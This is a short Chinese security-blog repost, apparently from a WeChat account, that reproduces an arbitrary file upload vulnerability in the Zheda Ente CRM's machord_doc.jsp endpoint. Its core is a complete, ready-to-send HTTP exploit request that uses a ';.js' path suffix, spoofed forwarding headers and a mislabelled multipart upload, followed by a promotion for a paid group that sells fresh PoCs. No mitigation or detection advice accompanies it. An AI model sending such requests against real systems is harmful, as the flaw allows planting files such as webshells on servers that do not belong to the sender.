免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责。
大家可以把安全绘景设为星标,这样就可以及时看到我们最新发布内容啦!
漏洞复现
漏洞数据包:
machord_doc.jsp任意文件上传
POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum=&fileName=666.txt&strAffixStr=&oprfilenam=null&gesnum= HTTP/1.1Host: xxxxContent-Length: 582Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQzxXQpKIb1f32N11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=xxxxx-forwarded-for: 127.0.0.1x-originating-ip: 127.0.0.1x-remote-ip: 127.0.0.1x-remote-addr: 127.0.0.1Connection: close------WebKitFormBoundaryQzxXQpKIb1f32N11Content-Disposition: form-data; name="oprfilenam"null------WebKitFormBoundaryQzxXQpKIb1f32N11Content-Disposition: form-data; name="uploadflg"0------WebKitFormBoundaryQzxXQpKIb1f32N11Content-Disposition: form-data; name="strAffixStr"------WebKitFormBoundaryQzxXQpKIb1f32N11Content-Disposition: form-data; name="selfilenam"------WebKitFormBoundaryQzxXQpKIb1f32N11Content-Disposition: form-data; name="uploadfile"; filename="666.txt"Content-Type: image/png123------WebKitFormBoundaryQzxXQpKIb1f32N11--
推广一波自己的星球:
安全绘景:持续更新0/1day的poc、红队技巧、实战文章、实用工具等资源,欢迎各位师傅来扰,不满意直接退款。最后祝愿各位师傅天天高危!
原文始发于微信公众号(安全绘景):浙大恩特CRM文件上传(梅开二度)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论